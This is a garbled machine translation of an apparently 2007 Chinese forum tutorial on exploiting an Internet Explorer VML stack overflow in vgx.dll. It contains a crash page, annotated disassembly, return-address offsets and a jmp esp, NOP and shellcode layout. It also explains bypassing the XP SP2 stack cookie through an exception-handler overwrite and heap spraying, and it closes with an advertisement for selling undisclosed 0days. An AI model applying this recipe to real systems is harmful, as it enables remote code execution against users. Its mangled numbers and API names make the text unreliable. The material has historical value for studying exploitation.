IEVML overflow analysis process and COOKIE protection bypass(teaching)-vulnerability warning-the black bar safety net

2007-05-26T00:00:00
ID MYHACK58:62200715598
Type myhack58
Reporter 佚名
Modified 2007-05-26T00:00:00

Description

Small E PS: could someone look over,a few months before,but is really the classic teaching articles! A. Write in front of words

This article is in invincible and virus two people of intense curiosity request,today I skipped school for half a day to write. In fact, I think now that everything has been disclosed,no sense to keep it going,then write out this message,to comfort the reader. In addition I was also a rookie,even won a little experience,willing to and I like the rookie they share,to master it when the guide of the look. So I don't skimp on your own technique. In this I reference in this ice Fox signature on the sentence tells some people:"don't get technical when a baby." ps:this article and all the comments is the following code comment. ps:of course this is not an overflow basis of tutorials,in need of a little compilation of the base and overflow basis. In addition the article said is not a fresh technique,write out as a tutorial to beginners to see. ps:article written for a primary,if there is a wrong place,also requested the master to correct me.

II. Vulnerability analysis

I'm ready to start from the beginning of the analysis process is complete write it down,so the articles may stink for a long,but very helpful for beginners. vml of this vulnerability,there is no detection of the length of the buffer of a vulnerability,should be incidental with more than 2 6 0 characters buff replaces the method name,IE error message,then analysis going concluded the use of way. So we also use this approach to detect vulnerabilities.

First with 2 6 4(This value is in the exploration of vulnerability when you can own increments)A'A'fill vml page of the method name.

<v:fill method="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"/>

We use the debugger to load ie,here I used ollydbg(hereinafter referred to as od). On this page,call the police"don't know how to avoid the Address 0 0 4 1 0 0 4 1,Please change the eip to re-execute",it seems clear,have the return address be overwritten. In the stack information can also be seen below,in this case the esp value of 6 9 4 5 0,6 9 4 4 4,6 9 4 4 8 The two address original value is how much we don't know. Should be overwritten return address.

0006943C 0 0 4 1 0 0 4 1 iexplore. 0 0 4 1 0 0 4 1 0 0 0 6 9 4 4 0 0 0 4 1 0 0 4 1 iexplore. 0 0 4 1 0 0 4 1 0 0 0 6 9 4 4 4 0 0 4 1 0 0 4 1 iexplore. 0 0 4 1 0 0 4 1 0 0 0 6 9 4 4 8 0 0 4 1 0 0 4 1 iexplore. 0 0 4 1 0 0 4 1

Then you can see the stack below:

0 0 0 6 9 4 5 4 0009B00C UNICODE "AAAAAAAAAAA..." 0 0 0 6 9 4 5 8 0 0 0 0 0 0 0 0 0006945C 0 0 0 0 0 0 0 0 0 0 0 6 9 4 6 0 659B8C10 return to 659B8C10 from 659B3260

It seems that the overflow is happening in 659b3260 this function to the calling function,in 659b3260 this address under the hardware execution breakpoint,use od to view memory and discover this address is at the vgx. dll,appears to be substantially right. Start again od,loaded ie,visit this page,soon off here. (In fact,if you compile comparative t, can directly see the code analysis,I'm not,so with the od of the savings every step of the execution results,and analysis)

Following the start of the boring of the analysis,hoping not to fall asleep:

func_659b3260{

659B3260 5 1 PUSH ECX 659B3261 5 3 PUSH EBX 659B3262 5 6 PUSH ESI 659B3263 5 7 PUSH EDI 659B3264 8BF1 MOV ESI,ECX 659B3266 33FF XOR EDI,EDI 659B3268 8BDA MOV EBX,EDX 659B326A 3BF7 CMP ESI,EDI 659B326C 0F84 D1000000 JE vgx. 659B3343 659B3272 6 6:393E CMP WORD PTR DS:[ESI],DI 659B3275 0F84 C8000000 JE vgx. 659B3343 659B327B 5 6 PUSH ESI //This is to get the string length of the function,here is the return'AAAA'in the memory of the length,in units of Word,word,returns in eax 659B327C E8 3F09F1FF CALL vgx. 658C3BC0 //There's a switch,I do not know you see no,often see a compilation of people who should be seen //Here by the tear way,the switch in compilation is the first to calculate the value,after the Unified using jmp a way to jump to the case so relatively fast,so that the switch and if..else are connected in series nature is still a difference. Some teachers like fraught,such as my teacher.. 659B3281 83FB 0 7 CMP EBX,7 659B3284 0F87 B2000000 JA vgx. 659B333C 659B328A FF249D 4C339B65 JMP DWORD PTR DS:[EBX*4+659B334C] 659B3291 5 0 PUSH EAX 659B3292 5 6 PUSH ESI ........... (Here omitted part of the code)..... 659B332C C3 RETN //Pressed into the length of the string 659B332D 5 0 PUSH EAX //Is pressed into the string address 659B332E 5 6 PUSH ESI //Here is also the string address. 659B332F 8D4C24 1 4 LEA ECX,DWORD PTR SS:[ESP+1 4] //It seems I have been 0 0 4 1 0 0 4 1 overwrite the return address should be here. The following highlights the analysis of this function 659B3333 E8 0E480200 CALL vgx. 659D7B46 659B3338 8B7C24 0C MOV EDI,DWORD PTR SS:[ESP+C] 659B333C 8BC7 MOV EAX,EDI 659B333E 5F POP EDI 659B333F 5E POP ESI 659B3340 5B POP EBX 659B3341 5 9 POP ECX 659B3342 C3 RETN }

func_659D7B46{

659D7B46 5 5 PUSH EBP 659D7B47 8BEC MOV EBP,ESP //You can see here the stack frame is dead,if not followed do not do a length check,over a 2 1 0-8=2 0 8(1 0-ary 5 2 0)to a string will produce an overflow //Later you can see the xp_sp2 system here is 2 1 4,lot A is do cookies perform a protected variable. 659D7B49 81EC 1 0 0 2 0 0 0 0 SUB ESP,2 1 0 659D7B4F 8B45 0 8 MOV EAX,DWORD PTR SS:[EBP+8] 659D7B52 8 3 2 1 0 0 AND DWORD PTR DS:[ECX],0 659D7B55 85C0 TEST EAX,EAX 659D7B57 894D FC MOV DWORD PTR SS:[EBP-4],ECX 659D7B5A 7 4 7 2 JE SHORT vgx. 659D7BCE 659D7B5C 8B4D 0C MOV ECX,DWORD PTR SS:[EBP+C] 659D7B5F 85C9 TEST ECX,ECX 659D7B61 7 4 6B JE SHORT vgx. 659D7BCE 659D7B63 6 6:8 3 3 8 0 0 CMP WORD PTR DS:[EAX],0 659D7B67 7 4 6 5 JE SHORT vgx. 659D7BCE 659D7B69 83A5 F8FDFFFF 0>AND DWORD PTR SS:[EBP-2 0 8],0 //Is pressed into the string address 659D7B70 5 6 PUSH ESI 659D7B71 898D F4FDFFFF MOV DWORD PTR SS:[EBP-20C],ECX //Pressed into the 0,should be saved return value,the record has been assigned a value of how many characters 659D7B77 5 7 PUSH EDI 659D7B78 8D8D F0FDFFFF LEA ECX,DWORD PTR SS:[EBP-2 1 0] 659D7B7E 8 9 8 5 F0FDFFFF MOV DWORD PTR SS:[EBP-2 1 0],EAX 659D7B84 33FF XOR EDI,EDI //This is the overflow function. Some parameters are in the register,which is used in the fastcall call, //But here there is no any parameter passed 2 1 0 the stack limit value,which inevitably will lead to overflow,see the following analysis 659D7B86 E8 5FFFFFFF CALL vgx. 659D7AEA 659D7B8B 85C0 TEST EAX,EAX 659D7B8D 7 4 3 4 JE SHORT vgx. 659D7BC3 659D7B8F 33D2 XOR EDX,EDX 659D7B91 8BC8 MOV ECX,EAX 659D7B93 E8 DE450000 CALL vgx. 659DC176 659D7B98 8BF0 MOV ESI,EAX 659D7B9A 85F6 TEST ESI,ESI 659D7B9C 7C 0 7 JL SHORT vgx. 659D7BA5 659D7B9E 83FE 0 2 CMP ESI,2 659D7BA1 7F 1B JG SHORT vgx. 659D7BBE 659D7BA3 0BFE OR EDI,ESI 659D7BA5 8D8D F0FDFFFF LEA ECX,DWORD PTR SS:[EBP-2 1 0] 659D7BAB E8 3AFFFFFF CALL vgx. 659D7AEA 659D7BB0 85C0 TEST EAX,EAX 659D7BB2 ^ 7 5 DB JNZ SHORT vgx. 659D7B8F 659D7BB4 83FE 0 2 CMP ESI,2 659D7BB7 7F 0 5 JG SHORT vgx. 659D7BBE 659D7BB9 83FF 0 3 CMP EDI,3 659D7BBC 7 5 0 5 JNZ SHORT vgx. 659D7BC3 659D7BBE BF 0 3 0 0 0 0 4 0 MOV EDI,4 0 0 0 0 0 0 3 659D7BC3 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 659D7BC6 8 9 3 8 MOV DWORD PTR DS:[EAX],EDI 659D7BC8 5F POP EDI 659D7BC9 B0 0 1 MOV AL,1 659D7BCB 5E POP ESI 659D7BCC EB 0 2 JMP SHORT vgx. 659D7BD0 659D7BCE 32C0 XOR AL,AL 659D7BD0 C9 LEAVE //Overflow here return time is from the cover of the esp address(shellcode address)at remove performed, //Special note that,here after the return of the esp will be+8,so your shellcode to be placed away from the return address, 8 direct far 659D7BD1 C2 0 8 0 0 RETN 8 }

func_659D7AEA{

659D7AEA 8B11 MOV EDX,DWORD PTR DS:[ECX] 659D7AEC 5 3 PUSH EBX 659D7AED 5 6 PUSH ESI 659D7AEE 33F6 XOR ESI,ESI 659D7AF0 3BD6 CMP EDX,ESI 659D7AF2 5 7 PUSH EDI 659D7AF3 7 4 4A JE SHORT vgx. 659D7B3F 659D7AF5 8B41 0 8 MOV EAX,DWORD PTR DS:[ECX+8] 659D7AF8 3B41 0 4 CMP EAX,DWORD PTR DS:[ECX+4] 659D7AFB 7D 4 2 JGE SHORT vgx. 659D7B3F 659D7AFD 6 6:3 9 3 4 4 2 CMP WORD PTR DS:[EDX+EAX2],SI 659D7B01 7 4 3C JE SHORT vgx. 659D7B3F 659D7B03 8D41 0C LEA EAX,DWORD PTR DS:[ECX+C] 659D7B06 8BF8 MOV EDI,EAX 659D7B08 8B51 0 8 MOV EDX,DWORD PTR DS:[ECX+8] 659D7B0B 8B19 MOV EBX,DWORD PTR DS:[ECX] 659D7B0D 6 6:8B1453 MOV DX,WORD PTR DS:[EBX+EDX2] 659D7B11 6 6:85D2 TEST DX,DX 659D7B14 7 4 1D JE SHORT vgx. 659D7B33 659D7B16 6 6:83FA 2 0 CMP DX,2 0 659D7B1A 7 5 0 6 JNZ SHORT vgx. 659D7B22 659D7B1C 85F6 TEST ESI,ESI 659D7B1E 7F 1 7 JG SHORT vgx. 659D7B37 659D7B20 EB 0 6 JMP SHORT vgx. 659D7B28 //The'AAA..'string to write into the memory address,this address is from the func_659D7B46 the stack frame base address-2 1 0+c beginning,i.e. from here func_659D7B46 return pointer 2 0 8+4=20c=5 2 4 characters. 659D7B22 6 6:8 9 1 7 MOV WORD PTR DS:[EDI],DX //Here increment'AAA'in the address parameter 659D7B25 4 6 INC ESI 659D7B26 4 7 INC EDI 659D7B27 4 7 INC EDI 659D7B28 FF41 0 8 INC DWORD PTR DS:[ECX+8] //You can see here are just made of whether the complete string copy of the judgment,not to make the length of the judgment. 659D7B2B 8B51 0 8 MOV EDX,DWORD PTR DS:[ECX+8] 659D7B2E 3B51 0 4 CMP EDX,DWORD PTR DS:[ECX+4] 659D7B31 ^ 7C D5 JL SHORT vgx. 659D7B08 659D7B33 85F6 TEST ESI,ESI 659D7B35 7E 0 8 JLE SHORT vgx. 659D7B3F 659D7B37 6 6:8 3 6 4 7 1 0C 0 0 AND WORD PTR DS:[ECX+ESI*2+C],0 659D7B3D EB 0 2 JMP SHORT vgx. 659D7B41 659D7B3F 33C0 XOR EAX,EAX 659D7B41 5F POP EDI 659D7B42 5E POP ESI 659D7B43 5B POP EBX 659D7B44 C3 RETN }

Well,with these data,you can basically write overflow.

Simply put the following steps of:firstly with a string filled 2 6 0 characters,it will be converted to unicode characters,becomes twice longer,become 5 2 0,just cover up all the stack frame,followed by a jmpesp address coverage func_659D7B46 the returned pointer,followed by 8 0x90(nop instruction)is filled retn 8 distance,and then fill in your shellcode code,can also fill in the jump to the shellcode of code.

Draw a schematic diagram,combined with func_659D7AEA understand:

|---------| | |-- <=== ecx,which is a string address |---------| | |5 2 4 | | <== the length of the string |---------| | |5 2 0 | | <== has been written to the length of the |---------| |------------------------The entire stack frame is 2 1 0(5 2 8)characters | .... | |- |---------| | | | .... | | | <=== to be written to the data |---------| | |----------------------To coverage 5 2 0 characters before they reach the func_659D7B46 the return address. | .... | | | |---------| | | |Is modified to |-- - <=== ebp pointer address |---------| |6ff15e2e | <=== func_659D7B46 the return address,in the end we want to modify is here |---------|

Reference I in the Annex provides ievml_with_2000. c,can also be a direct reference to the nop that code,is basically the same.

III. xp_sp2 cookie protection.

windows2000 with this article The above argument can be implemented to overflow,but this method is used in winxp+sp2 on it,the reason is vs is. net to provide a/gs implementation of the protection of the compilation mode,this mode in the release version is enabled by default,the purpose is to prevent buffer overflows,so we have just 2 0 0 0 use of the generic overflow. Can not be achieved.

(Here, by the way plug two sentences,cookie protection this protection is for the overflow to attack of a many protection method,so for each method with the corresponding solutions,no one solution is the universal solution to all of the overflow protection)

See func_659D7B46 here:

func_659D7B46{

6FF3ED46 8BFF MOV EDI,EDI 6FF3ED48 5 5 PUSH EBP 6FF3ED49 8BEC MOV EBP,ESP //See here more than 4 bytes of data 6FF3ED4B 81EC 1 4 0 2 0 0 0 0 SUB ESP,2 1 4 //Is to do this with,address 6FF44160 at the store is a global variable,store a random value(accurate to with a few function's return value as a parameter to calculate the value) 6FF3ED51 A1 6041F46F MOV EAX,DWORD PTR DS:[6FF44160] 6FF3ED56 8 3 2 1 0 0 AND DWORD PTR DS:[ECX],0 6FF3ED59 8 9 4 5 FC MOV DWORD PTR SS:[EBP-4],EAX 6FF3ED5C 8B45 0 8 MOV EAX,DWORD PTR SS:[EBP+8] 6FF3ED5F 85C0 TEST EAX,EAX 6FF3ED61 898D ECFDFFFF MOV DWORD PTR SS:[EBP-2 1 4],ECX 6FF3ED67 7 4 7 4 JE SHORT vgx. 6FF3EDDD 6FF3ED69 8B4D 0CMOV ECX,DWORD PTR SS:[EBP+C] 6FF3ED6C 85C9 TEST ECX,ECX 6FF3ED6E 7 4 6D JE SHORT vgx. 6FF3EDDD 6FF3ED70 6 6:8 3 3 8 0 0 CMP WORD PTR DS:[EAX],0 6FF3ED74 7 4 6 7 JE SHORT vgx. 6FF3EDDD 6FF3ED76 83A5 F8FDFFFF 0>AND DWORD PTR SS:[EBP-2 0 8],0 6FF3ED7D 898D F4FDFFFF MOV DWORD PTR SS:[EBP-20C],ECX 6FF3ED83 5 3 PUSH EBX 6FF3ED84 8D8D F0FDFFFF LEA ECX,DWORD PTR SS:[EBP-2 1 0] 6FF3ED8A 8 9 8 5 F0FDFFFF MOV DWORD PTR SS:[EBP-2 1 0],EAX 6FF3ED90 33DB XOR EBX,EBX 6FF3ED92 E8 4FFFFFFF CALL vgx. 6FF3ECE6 6FF3ED97 85C0 TEST EAX,EAX 6FF3ED99 7 4 3 5 JE SHORT vgx. 6FF3EDD0 6FF3ED9B 5 6 PUSH ESI 6FF3ED9C 6A 0 0 PUSH 0 6FF3ED9E 5 0 PUSH EAX 6FF3ED9F E8 1 7 2 8 0 0 0 0 CALL vgx. 6FF415BB 6FF3EDA4 8BF0 MOV ESI,EAX 6FF3EDA6 85F6 TEST ESI,ESI 6FF3EDA8 7C 0 7 JL SHORT vgx. 6FF3EDB1 6FF3EDAA 83FE 0 2 CMP ESI,2 6FF3EDAD 7F 1B JG SHORT vgx. 6FF3EDCA 6FF3EDAF 0BDE OR EBX,ESI 6FF3EDB1 8D8D F0FDFFFF LEA ECX,DWORD PTR SS:[EBP-2 1 0] 6FF3EDB7 E8 2AFFFFFF CALL vgx. 6FF3ECE6 6FF3EDBC 85C0 TEST EAX,EAX 6FF3EDBE ^ 7 5 DC JNZ SHORT vgx. 6FF3ED9C 6FF3EDC0 83FE 0 2 CMP ESI,2 6FF3EDC3 7F 0 5 JG SHORT vgx. 6FF3EDCA 6FF3EDC5 83FB 0 3 CMP EBX,3 6FF3EDC8 7 5 0 5 JNZ SHORT vgx. 6FF3EDCF 6FF3EDCA BB 0 3 0 0 0 0 4 0 MOV EBX,4 0 0 0 0 0 0 3 6FF3EDCF 5E POP ESI 6FF3EDD0 8B85 ECFDFFFF MOV EAX,DWORD PTR SS:[EBP-2 1 4] 6FF3EDD6 8 9 1 8 MOV DWORD PTR DS:[EAX],EBX 6FF3EDD8 B0 0 1 MOV AL,1 6FF3EDDA 5B POP EBX 6FF3EDDB EB 0 2 JMP SHORT vgx. 6FF3EDDF 6FF3EDDD 32C0 XOR AL,AL 6FF3EDDF 8B4D FC MOV ECX,DWORD PTR SS:[EBP-4] //Here a function..what is it? The following analysis 6FF3EDE2 E8 3829F9FF CALL vgx. 6FED171F 6FF3EDE7 C9 LEAVE 6FF3EDE8 C2 0 8 0 0 RETN 8 }

The other I will not analyze,is basically 2 0 0 0 under that code is the same. Below to see this perform the protection function

func_6FED171F{

//Obviously you can see here that the value of the cookie to do the detection,if it is covered,it immediately proceeds to the error process,end the current process //Here 6FF44160 point to the value same as above,is stored in the cookie value. 6FED171F 3B0D 6041F46F CMP ECX,DWORD PTR DS:[6FF44160] 6FED1725 7 5 0 9 JNZ SHORT vgx. 6FED1730 6FED1727 F7C1 0000FFFF TEST ECX,FFFF0000 6FED172D 7 5 0 1 JNZ SHORT vgx. 6FED1730 6FED172F C3 RETN 6FED1730 E9 0 5 0 0 0 0 0 0 JMP vgx. 6FED173A ...... (Here omitted some code)....

6FED180D FF15 9C11E96F CALL DWORD PTR DS:[<&KERNEL32. SetUnhandl>; kernel32. SetUnhandledExceptionFilter 6FED1813 8D45 F8 LEA EAX,DWORD PTR SS:[EBP-8] 6FED1816 5 0 PUSH EAX 6FED1817 FF15 9811E96F CALL DWORD PTR DS:[<&KERNEL32. UnhandledE>; kernel32. The unhandledexceptionfilter 6FED181D 6 8 0 2 0 5 0 0 0 0 PUSH 5 0 2 6FED1822 FF15 9411E96F CALL DWORD PTR DS:[<&KERNEL32. Getcurrentuser>; kernel32. GetCurrentProcess 6FED1828 5 0 PUSH EAX 6FED1829 FF15 9011E96F CALL DWORD PTR DS:[<&KERNEL32. TerminateP>; kernel32. TerminateProcess }

This cookie is a present in the ebp above a value,you want to overwrite the function return address,be certain to go through to cover this value,will definitely change this value,so long as the return when testing this value has been modified,you can determine whether there is an overflow situation occurs,a schematic diagram is as follows:

|---------| | |-- <=== ecx,which is a string address |---------| | |5 2 4 | | <== the length of the string |---------| | |5 2 0 | | <== has been written to the length of the |---------| |------------------------The entire stack frame is 2 1 0(5 2 8)characters | .... | |- |---------| | | | .... | | | <=== to be written to the data |---------| | |----------------------To coverage 5 2 0 characters before they reach the func_659D7B46 the return address. | .... | | | |---------| | | |Is modified to |-- - <== here is the cookie value,as can be seen,you have to modify the ebp,to modify func_659D7B46 value,this cookie value is also sure to be modified. |---------| |Been modified | <=== ebp pointer address |---------| |6ff15e2e | <=== func_659D7B46 return address |---------|

Now the problem is clear,how to bypass this detection value? There are many ways. For example, you can cover the cookie value,but need the code with the code from is we cover the memory area of the removed data pointer. vgx in the rest of the code, no such code. Furthermore because this is an overflow,so you can cover the stack of any address,the windows exception handling mechanism is also used to stack,they put the exception handling function address into a single chain table saved in the stack,the stack is we can cover,we can use the shellcode to the address of the function to cover this exception the address of the function,so if we can make the program an exception occurs,then the system will remove the stack in exception the address of the function to handle the exception,our shellcode will be executed.

However, in a careful analysis of the overflow after it occurs and to reach the cookie between the detection of the code,discover that no one can produce the exception of code words,even tonal take is that we cover the region of the value of the operation. But fortunately there is another way. xp ie program 栈地址 is in 0 0 1 2 0 0 0 0 start address to 0012ffff the end,followed by the next segment of address is:0 0 1 3 0 0 0 0,with OD to view this section of the property.

Memory-mapped, entry 4 Address=0 0 1 3 0 0 0 0 Size=0 0 0 0 3 0 0 0 (1 2 2 8 8.) Owner= 0 0 1 3 0 0 0 0 (Self) Section= Type=Map 0 0 0 4 1 0 0 2 Access=R Initial access=R

You can see the access permissions are R,which is read-only. So good organized,we can use the existing stack overflow can overwrite the address of the properties,if you can override the Read-Only address,sure will produce a memory access error,which is an exception,as a result,we reached an exception object. So we can overflow to let the shellcode directly to give permission to run,allow the implementation of protection go to hell.

Specific approach:

The debugging process can be found,to reach the overflow point of time,ie the stack is currently:

0012BFD0 0012C204 0012BFD4 001EF644 UNICODE "AAAA...." 0012BFD8 0 0 0 0 0 10 8 0012BFDC 0 0 0 0 0 1 0 8 0012BFE0 0 0 4 1 0 0 4 1 iexplore. 0 0 4 1 0 0 4 1 0012BFE4 0 0 4 1 0 0 4 1 iexplore. 0 0 4 1 0 0 4 1

In 0012bfe0 place,so we are going to cover to 0 0 1 3 0 0 0 0 place need 130000h - 12bfe0h = 4020h = 1 6 4 1 4 characters,into the'AAAA...'to illustrate,is what we want to fill at least 8 0 0 0 multiple A to cover the To 130000h address,well in this overflow there is no length limit. 8 0 0 0 more 8 0 0 0 more,in order to conservative,we can use 1 0 0 0 0 A A to do the test. (A bit-_-!!).

The specific file I'm not posted,please refer to the

<v:fill method="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"/>

Of course, there OF A is 1 0 0 0 0,Then xp+sp2,with ie access this page. In order to intuitive watch to the exception handling process,we use the od in the stack of 0012ffff at lower hardware write breakpoint,word length.

You can see that when 1 3 0 0 0 0 is written,the program jumps to the exception handling on the implementation,if we use the correct executable address overwrite the exception handler,the exception will call the following code:

7C923799 5 5 PUSH EBP 7C92379A 8BEC MOV EBP,ESP 7C92379C FF75 0C PUSH DWORD PTR SS:[EBP+C] 7C92379F 5 2 PUSH EDX 7C9237A0 6 4:FF35 0 0 0 0 0 0 0>PUSH DWORD PTR FS:[0] 7C9237A7 6 4:8 9 2 5 0 0 0 0 0 0 0>MOV DWORD PTR FS:[0],ESP 7C9237AE FF75 1 4 PUSH DWORD PTR SS:[EBP+1 4] 7C9237B1 FF75 1 0 PUSH DWORD PTR SS:[EBP+1 0] 7C9237B4 FF75 0C PUSH DWORD PTR SS:[EBP+C] 7C9237B7 FF75 0 8 PUSH DWORD PTR SS:[EBP+8] //Here is exception handling address,is our shellcode coverage 7C9237BA 8B4D 1 8 MOV ECX,DWORD PTR SS:[EBP+1 8] //Call our shellcode 7C9237BD FFD1 CALL ECX

This made the Execute permissions.

In fact, this cover exception handling the success rate is very low,probably a version difference cause a function call the difference,the stack difference,the coverage within that exception,so there is a way very early and some methods suitable for IE overflow(possible also only for IE overflow it),because ie overflow before the overflow is can apply for heap memory,so we can use javascript to apply a large amount of heap memory,completely filled with 0x90 characters connected shellcode such a model,and then with just one that has applied for a heap memory address(shellcode address)to cover the entire stack,so whether this abnormal processing in the What address,we can use the correct memory address(shellcode address)to cover it. That is milw0rm. com those on the sp2 code.

However, this approach is also flawed,different machine heap application address is different,such as you with 0a0a0a0a full coverage of the stack,then you did not apply to the 0a0a0a0a before start of heap address,then your shellcode will not be executed,yesterday evening virus brother looking for me debugging is a good example. Its machine there is no from 0 5 0 5 0 5 0 5 start the application heap address,then milw0rm. com to download the code can't use,I let him use the 0d is replaced by 0 and 5 can be performed. It seems my character better,virus brother usually no less peek MM Bath..ha...

Reference I in the Annex provides ievml_with_xpsp2. c,can also be a direct reference to milw0rm. com that code.

IV. Conclusion

A few days ago I and spend brother,little they said vml had sp2 the other night just debugging the xp_sp2 version,originally wanted to leave to earn a little extra money,give them clear off the drinks. all good..and behold it was only a few days, I haven't found a buyer,it has been disclosed to the mess. Alas..sigh,not their own kids is bad...in fact here is to want to do their own advertising,I have long been have not disclosed 0day for sale,however,please care a acquaintances come to me to buy,strangers don't know you don't visit me. What counts as acquaintances,very simple Ah,you ask a person and my friendship how can. Well,do not say too much. Wish everyone have a happy mid-Autumn Festival.^_^~